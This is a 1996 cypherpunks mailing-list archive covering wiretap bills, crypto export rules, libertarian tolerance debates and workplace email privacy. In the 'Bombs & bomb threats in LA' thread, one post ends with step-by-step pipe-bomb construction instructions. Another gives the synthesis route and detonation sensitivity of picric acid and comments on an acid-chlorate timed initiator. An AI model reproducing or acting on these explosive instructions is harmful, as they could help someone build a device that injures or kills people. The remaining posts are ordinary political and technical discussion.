To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Tolerance
Message-ID: <199608021412.KAA02133@nrk.com>
MIME-Version: 1.0
Content-Type: text


At 14:46 8/1/96, Chris Adams wrote:
>Just a comment to all of the 'true libertarians' out there, especially
>the "defend to the death" types:  How many of you defended Mr.
>Sternlight's recent membership?


Why should I? Was his membership under attack by the body?

I merely predicted how he would act. In the words of Click&Clack,
that's not rocket science. Almost anyone who has spent anytime
on Usenet knows, for example, that SternFUD will keep dragging
sci.crypt back in, and he will engage in personal slams, while
claiming he is above same. 

In the words of a net attorney I respect, SternFud is an
intellectual fraud.

[BTW, if you caught my post on same, he seems to regarded as a
buffoon & joke even within the inner circles of the Intelligence
Community...]

But I AM glad he left. Now, I do not have to feel quezyness over
agreeing (even on but one issue...) with Perry.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 3 Aug 1996 01:41:32 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <2.2.32.19960802141356.00886864@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:50 AM 8/2/96 EDT, Paul J. Bell wrote:
>i, for one, and perhaps others on the list as well, would be interested in
hearing
>what you mean when you say, "At&t, Microsoft, etc) who are ripping people
off on a 
>daily basis". 

I don't know about Microsoft but certainly AT&T long benefitted from local
telephone monopolies that resulted in increased prices and slower innovation
than would otherwise have been delivered.  Even today, long distance
carriers are licensed and there are substantial regulatory barriers to
entry.  International calls still are made under the control of an
international cartel of governments that keep prices way above competitive
levels.  This benefits AT&T and the rest.  Since it costs 2 cents a minute
to *produce* a call to London from New York the 45 cents to $1 a minute
charged represent an excessive price protected by the government regulated
cartel status of telecoms even in the Age of Deregulation.

AT&T should get honest work as should the others.

Maybe when I get a 10 (25?) mbps cable connection to the nets, I'll start
offering my neighbors net connections and LD phone service.  I could make a
pretty penny even savagely cutting the telco's markup.  Lots of challenges
ther but doable.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 06:40:49 +0800
To: cypherpunks@toad.com
Subject: Re: [off-topic] roving wiretaps
Message-ID: <ae27864d01021004dd81@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:52 AM 8/2/96, David Wagner wrote:

>I don't get it.  Help me out here-- how can this possibly be constitutional?
>
>I'm reading the Fourth Amendment to our honored Constitution of the United
>States, which proclaims
>
>        [...]
>        no warrants shall issue,
>        but upon probable cause,
>        supported by oath or affirmation,
>        and *particularly describing the place to be searched*,
>        and the persons or things to be seized.
>
>Are we just to strike out that emphasized phrase?  What's going on here?
>Someone tell me I'm not just having a bad nightmare.


The same way the Second Amendment has been turned into a shadow of itself
by creative lawyering.

("The Founders did not mean to include AR-15s and .45 Automatics as "guns,"
as these did not even exist in 1791. Likewise, cellular phones did not
exist in 1791, so the Fourth Amendment could not possibly apply to them.
Have a nice day.")

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 3 Aug 1996 01:58:28 +0800
To: cypherpunks@toad.com
Subject: My crypto-export URL was in the wrong place
Message-ID: <9608021433.AA26186@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I typo'd on the URL.
	http://www.osf.org/~rsalz/crypto-export.html
Sorry for any confusion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 05:55:39 +0800
To: cypherpunks@toad.com
Subject: SECURITY WARNING - D0 N0T D0WN0AD "New Clinton Administration Ping Policy"
Message-ID: <199608021800.LAA10715@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


WARNING!  DO NOT DOWNLOAD THE E-MAIL MESSAGE LABELED
         "New Clinton Administration Ping Policy"

IT C0NTAINS EVIDENCE 0F SECURITY VI0LATIONS IN THE HEADERS AND 
D0WNLOADING IT RISKS C0NTAMINATION 0F Y0UR MACHINE:
> X-Authentication-Warning: server1.chromatic.com: hua owned process doing -bs
> X-Authentication-Warning: server1.chromatic.com: Host hua@localhost didn't
use HELO protocol

> Return-Path: <cypherpunks-errors@toad.com>

FURTHERMORE, IT IS DISTRIBUTED BY THE THE CYPHERPUNKS-ERRORS LIST, 
AN 0RGANIZATION KN0WN T0 HAVE BR0KEN US EXP0RT-GRADE SECURITY 
AND APPARENTLY LED BY THE KN0WN FEL0N ``KLAUS'' AND AN ANARCHIST
W00DW0RKER BRIEFLY SUSPECTED IN THE UNAB0MBER CASE.




	TRUST NO ONE!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 05:36:45 +0800
To: cypherpunks@toad.com
Subject: Re: "And who shall guard the guardians?"
Message-ID: <199608021800.LAA10727@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



>On Cyperpunks recently, Tim May wrote:
>
>>The Latin maxim "And who shall guard the guardians?" has some relevance to
>>the headlong rush into converting the U.S. into even more of a security
>>state than it is now.

The English-Only bill just passed in the House bans the use of
non-English languages by government officials.  Does Tim's sudden 
avoidance of the Latin mean that _he_'s the Fed??  

At 02:57 PM 7/31/96 -0700, Martin Minow <minow@apple.com> wrote:

>I would suspect that a Baysian analysis
>would indicate that the risk of holding (and losing) a key is
>greater than the risk of not holding (and needing) a key.

Cui bono?  Or, in this case, risk to _whom_?
The damage from losing a key is done to the key's owner,
who's a mere Subject, while the dangers of needing a key
that one doesn't have are interference with the Custodians
doing the jobs they want to do.  Sounds like a no-brainer,
from the Government's viewpoint.

	TRUST NO ONE!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 05:34:18 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
Message-ID: <199608021800.LAA10722@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:16 PM 7/31/96 -0700, Tom Weinstein <tomw@netscape.com> wrote:

>The only thing they can revoke is their permission to provide it for
>download over the internet.  They can't revoke our permission to sell
>it in stores or via snail mail.

They _could_ refuse to give export permission for new RC4/40 versions,
and threaten prosecution if it's placed on the Internet.
It would be highly bogus, of course, but that's one of the "benefits"
of using selective enforcement and having the export strength limitations
be an individual-case-basis rather than a defined law they can be held to.

Tim wrote:
> Actually approving of disapproving a piece of software for sale 
> to U.S. citizens is not currently possible.

Sure.  The Commerce Klaus of the Constitution lets them do it
if they want to, though that required Congressional cooperation.


	TRUST NO ONE!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Sat, 3 Aug 1996 05:00:22 +0800
To: cypherpunks@toad.com
Subject: URGENT: Surveillance Bill Gets New Life - House Vote lLikely TODAY!
Message-ID: <v02140b02ae27c94754e5@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


(please forward where appropriate)

It's not over yet....

The House has scheduled a vote on "suspension" for a 'counter-terrorism'
bill TODAY (Friday).

Despite media reports that the negotiations had stalled out, house
Republicans have apparently worked out their differences and are set to
vote on the bill today.  The Senate may or may not vote on the measure on
Saturday.

No one I've talked to knows for sure what's in the bill, though I have
heard that there are no encryption provisions and that some of the wiretap
proposals have been scaled back.

I will post details as I get them. In the mean time, keep those calls
coming into Congress.

Jonah

  ** THE FIGHT FOR FREE SPEECH ONLINE CONTINUES TO THE SUPREME COURT **
      It's not too late to be a part of history -- Join the Lawsuit
         <http://www.cdt.org/ciec>   --    <ciec-info@cdt.org>

--
Jonah Seiger, Policy Analyst           Center for Democracy and Technology
<jseiger@cdt.org>                           1634 Eye Street NW, Suite 1100
                                                      Washington, DC 20006
PGP Key via finger                                     (v) +1.202.637.9800
http://www.cdt.org/                                    (f) +1.202.637.0968
http://www.cdt.org/homes/jseiger/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 03:12:41 +0800
To: cypherpunks@toad.com
Subject: RE: Tolerance (fwd)
Message-ID: <199608021614.LAA10026@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: jbugden@smtplink.alis.ca
> Date: Fri, 02 Aug 96 11:19:52 EST
> Subject: RE: Tolerance (fwd)
> 
> Jim Choate <ravage@einstein.ssz.com> wrote:
> >Libertarian views should be basicaly if it doesn't harm anothers person or
> >property without their prior consent then it should be legal and >permissible.
> 
> It is important to consider cultural factors when deciding how groups will react
> to differing standards of legal and permissible actions. For example, a brief
> summary of the basic tenets held by some different European cultures are given
> below:
> 
> British: Everything is permitted, unless it is forbidden.
> German: Everything is forbidden, unless it is permitted.
> France: Everything is permitted, especially if it is forbidden.
> 

Culture has nothing to do with inherent civil liberities, you have them
simply for being alive. People create social contracts to limit those
rights. You have the cart before the horse.

                                                    Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 3 Aug 1996 03:14:22 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: RE: Tolerance (fwd)
Message-ID: <9607028390.AA839009975@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@einstein.ssz.com> wrote:
>Libertarian views should be basicaly if it doesn't harm anothers person or
>property without their prior consent then it should be legal and >permissible.

It is important to consider cultural factors when deciding how groups will react
to differing standards of legal and permissible actions. For example, a brief
summary of the basic tenets held by some different European cultures are given
below:

British: Everything is permitted, unless it is forbidden.
German: Everything is forbidden, unless it is permitted.
France: Everything is permitted, especially if it is forbidden.

Au revoir,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 03:38:35 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: "adjust your attitude with their billy club" (fwd)
In-Reply-To: <199608021128.GAA09487@einstein>
Message-ID: <Pine.SV4.3.91.960802112429.19637D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<<  9th & 10th AMendments to the Conmstitution >>

Cute, you left out the Third.

We are referring to the Sovereign power of the State of Washington to 
allocate to the municipality of Seattle, a general Police Power to 
maintain the Peace.  Every lawyer seems to think that Seattle has the 
power to forbid people from using sidewalks as latrines and kitchen sinks.

I am in bed with the government, so I have better knowledge than most of 
the people on this list, about how bad it is. Nonetheless, I recall the 
aphorism from the Talmud: "Pray for the health of the government, lest 
the people eat other alive".

If someone wants to dress shabbily, go ahead, I'm sure you're making a
powerful and meaningful statement of your devotion to liberty. I don't
recall saying otherwise.  I might secretly recall the TRUE and
OVERWHELMING poverty I've seen in the Third World, which didn't prevent
the barely-fed mothers from assuring that their kid's third-hand,
threadbare school uniforms were nevertheless clean and pressed.  Everyone
has different standards of pride. Some people don't EVER say "please", or
"thank you". Suit yourself. 

If you want to walk into the public library after a six-month moratorium 
on bathing - well, the courts are divided on this, but _I_ stand for the 
proposition that this is an assault on the other patrons and I will lobby 
_my_ city councilman for there to be rules against it.

If you want to blast your Walkman into your own ear through an earphone, 
go ahead, blow your hearing away, perhaps (insh'allah) it will somehow 
operate to prevent you from depositing your genes into the next 
generation.

But if you want to play your boombox loud near me, make damn sure you do
it behind soundproof walls. Where I live, the cops will respond to that 
kind of complaint and shut down the nuisance, with nightsticks if need be 
(in my little rural area, it's seldom necessary). Maybe you California or 
NYC folks don't have police forces that will mitigate nuisances. Enjoy 
your progressive radical-chic neighborhood, folks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian T Hancher" <briant@atlantic.net>
Date: Sat, 3 Aug 1996 05:40:15 +0800
To: daw@cs.berkeley.edu (David Wagner)
Subject: Re: [off-topic] roving wiretaps
Message-ID: <199608021149.LAA24441@rio.atlantic.net>
MIME-Version: 1.0
Content-Type: text/plain


>P.S.  Do police really need a search warrant to wiretap cellular phones?

It is my understanding that police need a warrant to tap *cellular* 
phones, but not *wireless* phones.

One should understand that monitoring cellular traffic is *much* more 
difficult than tapping a conventional phone, because as the user 
moves around in the service area the phone switches to different 
repeaters, often several times during a conversation.

I am curious as to the language of the proposed law, as it is also my 
understanding that the government already has the (technical) means to monitor 
cellular traffic (but it requires a warrant, just like tapping a 
regular phone).

              Brian T. Hancher

       http://rio.atlantic.net/~briant

              briant@ocala.com
             briant@atlantic.net
      Brian.Hancher@lmi.fdles.state.fl.us




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 03:45:19 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: "adjust your attitude with their billy club" (fwd)
In-Reply-To: <199608021218.HAA09568@einstein>
Message-ID: <Pine.SV4.3.91.960802115406.23822A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Aug 1996, Jim Choate wrote:

> to yourself. The burden of proof rests on the individual to prove that such
> actions by a third party are a public nuisance.

   Bzzt, wrong anser. Thanks for playing.  A state and it's political 
subdivisions does have the power to enact an ordinance DEFINING what 
constitutes a public nuisance. They need merely protect 
constitutionally-protected rights.


The City of Seattle may not define the act of disseminating anonymous 
pamphlets as a nuisance. They may define the act of dissemination by 
throwing them out the window of a moving vehicle, as a nuisance.

YOu are disconnected from reality. I am not going to waste further 
keystrokes on this topic. My side already controls the electoral college 
on this one. It's not my problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George Kuzmowycz" <gkuzmo@ix.netcom.com>
Date: Sat, 3 Aug 1996 03:10:13 +0800
To: cypherpunks@toad.com
Subject: Corporate e-mail policy
Message-ID: <199608021611.JAA13044@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  The company I work for has set up a committee to draft a security 
policy involving, among other things, e-mail. Since I'm responsible 
for our networking and e-mail, I'm part of this group. Unfortunately, 
I'm outnumbered by legal, auditing and HR types who, basically, want 
to have access to everything.

  I am aware that there's a line of thinking which holds that what you
do or say on company time, using company equipment is the company's
business. I do not subscribe to this line of thinking, and believe
that employees expect a "zone of privacy" in which their telephone
calls will not be listened to and their e-mail will not be read or
monitored. I am also aware that recent court cases have not
supported this "zone of privacy" and have pretty much held that the
employer can do whatever it wants with e-mail. 

  What I want out of this process is to keep myself and my staff out 
of this business. As a practical matter, I'm sure the company could 
bring in a hired gun to do whatever they want; since our e-mail 
system does not easily support strong crypto, it's all there for the 
taking.

  In an ideal world, the rest of the group would agree with me and say
"Yup, we have no business reading e-mail." Since that's not likely,
I'm looking for examples of "privacy-friendly" corporate policies
that I can put on the table in our meetings, and end up with a
minority report.  

        -gk-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 3 Aug 1996 04:01:04 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: FPGAs and Heat (Re: Paranoid Musings)
In-Reply-To: <199608011848.LAA11828@netcom13.netcom.com>
Message-ID: <199608021711.MAA01770@homeport.org>
MIME-Version: 1.0
Content-Type: text


Mike Duvos wrote:

| That's one of the things that killed Thinking Machines.  It turned out
[...]
| At the time Thinking Machines went under, Seymour Cray had a big contract

	Just a nit, but Thinking Machines is still in business, and has
had their first few profitable quarters. www.think.com

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 06:37:46 +0800
To: cypherpunks@toad.com
Subject: Re: Bombs & bomb threats in LA
Message-ID: <ae27a13f03021004323f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:33 AM 8/2/96, Conrad Walton wrote:

>i'm not exactly sure what an acid bomb is, but according to my book, The
>Anarchist Cookbook, that I bought in 1972 (was the internet around back
>then?), there is a compound called "picric acid" that is "more powerful
>than TNT, but has some disadvantages".

The ARPANET (or ARPANet, or Arpanet...) was around then. (I had an account
on it, circa 1973...not very useful for me.)

I also got my copy of "The Anarchist Cookbook" back around then. It was in
the news locally when the Santa Barbara County Sheriff's office attempted
to have it removed from the local bookstores....this removed it all right,
as the stacks of copies sold out as quickly as they could be received and
unpacked.

(As others have noted over the years, much of the advice is probably bogus
and even dangerous. Not being an explosives dabbler, I wouldn't know.)

If Feinswine gets her ban on bomb-making information passed, and this is
upheld by the courts (doubtful), the sites will be swamped with information
queries, and fooling around with bombs will become more popular amongst the
teenage set that has not expressed much interest in such things the past
couple of decades.

The more things change, the more they remain the same.

--Tim May, an I-bomb-throwing crypto anarchist

Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack
the powder. Don't even tap the bottom of the pipe to make it settle.  You want
the powder loose.  For maximum explosive effect, you need dry, fine powder
sitting loose in a very rigid container.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 3 Aug 1996 03:48:54 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Bombs & bomb threats in LA
In-Reply-To: <32015CE7.3EF0@vail.tivoli.com>
Message-ID: <Pine.SUN.3.91.960802121035.25935C@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Aug 1996, Mike McNally wrote:
> 
> 	Marijuana is the match,
> 		Heroin is the fuse,
> 			And LSD is the BOMB.

Wasn't that Radioactive Goldfish?

IP is the Flame, TCP is the Fuse, HTTP is the Bomb

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Sat, 3 Aug 1996 04:04:08 +0800
To: cypherpunks@toad.com
Subject: More on the latest Surveillance Bill...
Message-ID: <v02140b07ae27da2f4dbb@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


The outline below is from a document produced by the House Republican
Conference.  It is ONLY A SUMMARY of the proposed bill and is NOT actual
legislation.  No one I have spoken with has seen any specific legislative
language yet.

The outline is confusing on several points, particularly the "FBI DIGITAL
TELEPHONY" Section, which says:

 "The bill authorizes the FBI to use enhanced telephone technology to
  investigate suspected terrorist activity.  Funding for equipment purchase was
  provided in the 1996 omnibus appropriations measure enacted earlier this
  year."

The first sentence above is not at all clear, and probably won't be until
we can get our hands on the actual text of the bill. It could be additional
wiretap authority (ie, roving wiretaps), or it could be nothing.  As far as
the funding goes, the "1996 omnibus appropriations measure" DID NOT contain
funding for implementation of the law - but it did appropriate $37 million
to cover new equipment for the FBI.

The rest looks like it is a scaled back version of a measure the
Administration and members of Congress were pushing earlier this week, but
the scope of the new bill depends a lot on what the actual text says.

I will post additional information as soon as I get it.

Jonah

--


                Bipartisan Antiterrorism Initiative
                                HR__

                     Committee on the Judiciary
                          No Report Filed
                         To Be Introduced

Floor Situation:

The House is scheduled to consider HR__ on Friday August 2, 1996. On
Thursday August 1, the Rules Committee granted a rule to allow the bill to
be considered under suspension of the rules. It is debatable for 40
minutes, may not be amended, and requires a two-thirds vote for passage.

Summary:

HR__ includes several bipartisan initiatives intended to bolster federal
efforts to combat domestic terrorism in addition to those already enacted
earlier this year as part of the 1996 Antiterrorism and Effective Death
Penalty Act (P.L. 104-132).  The bill contains the following
counter-terrorism provisions:

Aviation SECURITY MEASURES: The bill enables domestic airports to
aggressively search for and prevent explosives from causing destruction and
harm to individuals or property through enhanced explosive detection
procedures, baggage and passenger screening, and FBI authority to improve
airport security training and standards to ensure that provisions of the
1990 Aviation Security Act (P.L 101-604) are implemented expeditiously.
Specifically, the bill (1) requires the FAA to implement increased
explosives section methods immediately, (2) strengthen the level of
training and expertise possessed by security personnel who are assigned to
domestic airports, (3) allows airports to use available funding to
reinforce such training for security personnel, and (4) extends criminal
background requirements to include a greater number of airport employees.

IMPLEMENTATION OF EXISTING ANTI-TERRORISM LAWS: The bill urges
implementation of provisions enacted in the 1996 Antiterrorism and
Effective Death Penalty Act (P.L. 104-132), such as designating and
freezing the assets of foreign terrorist organizations and implementing
expedited removal procedures for aliens convicted of a crime.

BIPARTISAN "BLUE RIBBON" COMMISSION: The bill establishes a special
commission to review all aspects of U.S. anti-terrorism policy and make
legislative recommendations about methods to most effectively establish a
long-term defense against terrorist threats, including enhancing the
nation's human intelligence capabilities.

PRIVACY ACT AMENDMENTS: The bill includes provisions which grant a cause of
action against the U.S. if in the course of a wiretap investigation
damaging information is willfully disclosed to the detriment of an innocent
party by the federal government.  The cause of action includes monetary
damages to the plaintiff if a favorable decision is rendered in federal
court.

EXPLOSIVES STUDY: The bill authorizes a study on black and smokeless powder
by an independent agency selected by the National Institute of Justice.

FEDERAL RACKETEERING STATUTE CRIMES: The bill permits federal prosecutors
to deem those acts determined to be terrorist in nature as substantial
enough to invoke criminal prosecution under existing criminal racketeering
(RICO) statutes.

FBI DIGITAL TELEPHONY: The bill authorizes the FBI to use enhanced
telephone technology to investigate suspected terrorist activity.  Funding
for equipment purchase was provided in the 1996 omnibus appropriations
measure enacted earlier this year.

--

  ** THE FIGHT FOR FREE SPEECH ONLINE CONTINUES TO THE SUPREME COURT **
      It's not too late to be a part of history -- Join the Lawsuit
         <http://www.cdt.org/ciec>   --    <ciec-info@cdt.org>

--
Jonah Seiger, Policy Analyst           Center for Democracy and Technology
<jseiger@cdt.org>                           1634 Eye Street NW, Suite 1100
                                                      Washington, DC 20006
PGP Key via finger                                     (v) +1.202.637.9800
http://www.cdt.org/                                    (f) +1.202.637.0968
http://www.cdt.org/homes/jseiger/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott McGuire <svmcguir@syr.edu>
Date: Sat, 3 Aug 1996 04:06:29 +0800
To: cypherpunks@toad.com
Subject: Information gathering by news servers
Message-ID: <ML-2.2.839003612.7349.scott@homebox>
MIME-Version: 1.0
Content-Type: text/plain


How much information about what someone reads can be gathered
by a news server?  Is there an anonymous way to read a public
news server, or would a server have to be set up intentionally
to allow anonymous reading?

Scott





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 3 Aug 1996 06:44:16 +0800
To: Conrad Walton <cypherpunks@toad.com>
Subject: Re: Bombs & bomb threats in LA
Message-ID: <199608021942.MAA17510@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 AM 8/2/96 -0000, Conrad Walton wrote:

>i'm not exactly sure what an acid bomb is, but according to my book, The 
>Anarchist Cookbook, that I bought in 1972 (was the internet around back 
>then?), there is a compound called "picric acid" that is "more powerful 
>than TNT, but has some disadvantages". 

Picric acid is 2,4,6 trinitrophenol, easily produced by the nitric/sulfuric 
acid nitration of phenol.

If picric acid contains about 15% of water or more, it is rather stable and 
innocuous.  If it is allowed to completely dry out, it then becomes 
sensitive to detonation with a blasting cap.

One disadvantage of picric acid is that it reads with heavy metals (copper, 
lead, etc) to form unstable picrate salts.


>There is also instructions on using an inverted vial of sulpheric acid, 
>that will then eat thu the stopper at the top (bottom) of the vial. when 
>the acid makes it thru, then is mixes with Potassium Chloride 

Potassium _Chlorate_

and causes 
>a small explosion which sets off the larger explosion in the dynomite 
>packed around it. 

It would probably require a booster...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 3 Aug 1996 07:00:43 +0800
To: cypherpunks@toad.com
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now ...
Message-ID: <v02120d00ae280f477ab7@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:29 8/1/96, Timothy C. May wrote:

>(With the Internet Phone deals--even Intel is entering the market--why are
>there no widespread uses of PGP or S/MIME? Yes, I know about about PGPhone,
>and also the Nautilus product, but none seem to be used by anyone I know.
>Maybe we should spend some time talking about the practical realities of
>these tools.)

The sound quality really isn't there, unless you have a fast machine or a
fat pipe. In addition, the vast majority of Intel based computers lack the
crucial (for user acceptance) full-duplex soundcard. Add to that the
physical impossibility of getting decent real time services over a
non-isochronous network, such as the Internet, I'net phones just don't
provide suffcient speech quality for business/serious personal use even
without the added overhead of crypto.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Walberg <umwalber@cc.UManitoba.CA>
Date: Sat, 3 Aug 1996 05:55:41 +0800
To: Conrad Walton <conrad@walton.com>
Subject: Re: Bombs & bomb threats in LA
In-Reply-To: <1373144101-347077@industrial-artworks.com>
Message-ID: <Pine.SOL.3.91.960802130921.10502D-100000@merak.cc.umanitoba.ca>
MIME-Version: 1.0
Content-Type: text/plain


I remember seeing an item on TV that had mentioned an acid bomb (it was a
news report about a public access TV show that was showing people how to 
make bombs).  In this example, some common chemicals were mixed together, 
tightly closed, and moments later an explosion occured.  They never said 
the chemicals, for all I know it could have been lemon juice and baking 
soda in a sealed container, a la Dry Ice bomb...  It didn't look like a 
bomb of mass destruction, more of a loud bang and a smallish explosion...

Sean


On Fri, 2 Aug 1996, Conrad Walton wrote:

> >and everyplace else all the news.answers FAQs are stored. What, precisely, is
> >an acid bomb? Also note the standard blame-the-Internet (not, say, increased
> >irritation with government after the Republicans failed to reduce it) 
> >rhetoric.
> 
> i'm not exactly sure what an acid bomb is, but according to my book, The 
> Anarchist Cookbook, that I bought in 1972 (was the internet around back 
> then?), there is a compound called "picric acid" that is "more powerful 
> than TNT, but has some disadvantages". 

------------------------------------------------------------------
Sean Walberg                              umwalber@cc.umanitoba.ca
The Web Guy                  http://home.cc.umanitoba.ca/~umwalber 
UNIX Group, U. of Manitoba          PGP Key Available from Servers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Sat, 3 Aug 1996 05:12:55 +0800
To: "Brock N. Meeks" <hua@chromatic.com>
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now ...
Message-ID: <2.2.32.19960802172157.0072be14@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


And I testified in front of the House that their estimate was grossly
understated. I think it is more like 4-5 Billion . I called it the Software
Full Employment Act of 94. (copy of testimony available). djf

At 08:52 AM 8/2/96 -0700, Brock N. Meeks wrote:
>
>On Thu, 1 Aug 1996, Ernest Hua wrote:
>
>> Louis Freeh is now asking the Congress for $2 billion to fund
>> Digital Telephony.  Yes, that is FOUR TIMES what he said it
>> would cost the taxpayers to give up their own privacy.  Score
>> one for the cynics who said $500 million was not enough.
>
>I broke the story about how much Digital Telephony would *really* cost in 
>CyberWire Dispatch more than two years ago.  The price tag in my piece:  
>"... at least $2 billion..."  In that Dispatch I wrote that the Clinton 
>White House had made the decision to support the bill based on a flawed 
>cost/benefit analysis study the FBI had done.
>
>--Brock
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 3 Aug 1996 09:20:25 +0800
To: cypherpunks@toad.com
Subject: Re: Bombs & bomb threats in LA
Message-ID: <2.2.32.19960802202248.00b23440@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 PM 8/2/96 -0700, Timothy C. May wrote:

>I also got my copy of "The Anarchist Cookbook" back around then. It was in
>the news locally when the Santa Barbara County Sheriff's office attempted
>to have it removed from the local bookstores....this removed it all right,
>as the stacks of copies sold out as quickly as they could be received and
>unpacked.
>
>(As others have noted over the years, much of the advice is probably bogus
>and even dangerous. Not being an explosives dabbler, I wouldn't know.)

There are a great number of errors in the book.  (Details of many can be
found at http://www.wam.umd.edu/~ctmunson/aol_cookbook_faq.html .)  

The one error I found in the book when I was in High School was the recipe
for Nitrogen Triodide. (sp?)  The Anarchist's Cookbook lists four steps for
making it.  The first two are correct.  The second two (running alchhol and
ether, if I remember correctly) dry the mixture out and probibly detonate it
in the process.  (The ether would make things much worse, as ether is pretty
volitile in and of itself.)

I found better formulas for simple explosives in "Lee's Priceless Recipes".
(Which was published in 1912.  Long before the Internet.)

Ah, memories of High School chemistry classes...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






